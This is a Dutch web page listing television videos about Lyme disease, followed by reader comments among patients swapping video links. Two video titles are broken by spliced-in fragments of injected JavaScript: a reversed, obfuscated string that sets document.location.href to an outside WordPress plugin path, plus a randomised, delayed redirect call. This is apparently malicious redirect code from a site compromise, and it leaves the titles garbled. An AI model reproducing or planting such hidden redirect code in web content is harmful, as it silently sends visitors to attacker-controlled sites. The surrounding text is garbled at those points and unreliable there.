Videos over Lyme

Videos over Lyme

Hart van Nederland – over Lyme en de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toename van zelfmoord onder patiënten.
Dr Horowitz Presentation toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the Belgium Senate
Lyme | Zorg.nu (AVROTROS)
Ga voor de hele uitzending naar de website van Zorg.nu

Uitzendingen over Lyme bij de NPO

Voor een overzicht van alle uitzendingen over de ziekte van Lyme die er geweest zijn bij de NPO, ga dan naar de website van NPO. Hier staan uitzendingen van o.a. Netwerk, Missers, Nieuwsuur, Radar en je zal het maar hebben.

Bekijk ook:

Videos pagina

 • Fred Pelster
  27 november 2016 at 19:20

  Hoi Marleen. Mooi werk. Wij hebben echter heel veel reacties gehad op Marleen haar aanvallen. Laat dat maar zien. Dat schudt mensen wakker!!!

  • Marleen Groeneveld
   29 november 2016 at 07:49

   Hoi Fred,
   Dat is ook echt een indrukwekkend en heftig stukje. Ik vond het ook heel confronterend om te kijken omdat het precies was zoals ik er ook soms bij lag… Heb je een link naar een youtube filmpje ervan? Want dan zet ik het bij het rijtje op mn site!
   Liefs

  • Fred Pelster
   29 november 2016 at 07:56

   Hoi Marleen. Ik zal je even een filmpje proberen te sturen. Van gister….

  • Fred Pelster
   29 november 2016 at 08:00

   Geef je ff een seintje als t goedgegaan is? Anders ff pb.

  • Marleen Groeneveld
   1 december 2016 at 09:03

   Hoi Fred, heftig filmpje zeg. Vooral ook omdat het behoorlijk herkenbaar is. Het gaat dus nog steeds niet goed met Marleen? Wat ontzettend rot. Ik stuur je even een PBtje later op de dag. Knuffel voor jullie.

  • Marleen Groeneveld
   1 december 2016 at 14:32

   Fred Pelster, Ik weet trouwens dat ze voor de docu nog op zoek zijn naar opnames van zichtbare Lyme gerelateerde klachten. Je zou dit filmpje evt. kunnen mailen naar info@lymeepidemie.nl

 • Astrid Laan
  30 november 2016 at 14:03

  die lyme and reason special van foxNY is misschien ook wel interesant?

  • Marleen Groeneveld
   1 december 2016 at 08:54

   Zeker interessant! Had ik nog niet gezien, maar ik ga het er bij zetten. Thanx!!! 🙂

  • Astrid Laan
   1 december 2016 at 09:14

   ze hadden ook de hele interviews op youtube gezet, zaten wel interessantedingen tussen vond ik. deel twee is ook net uit maar die vond ik wat minders interssant persoonlijk.

  %d bloggers liken dit: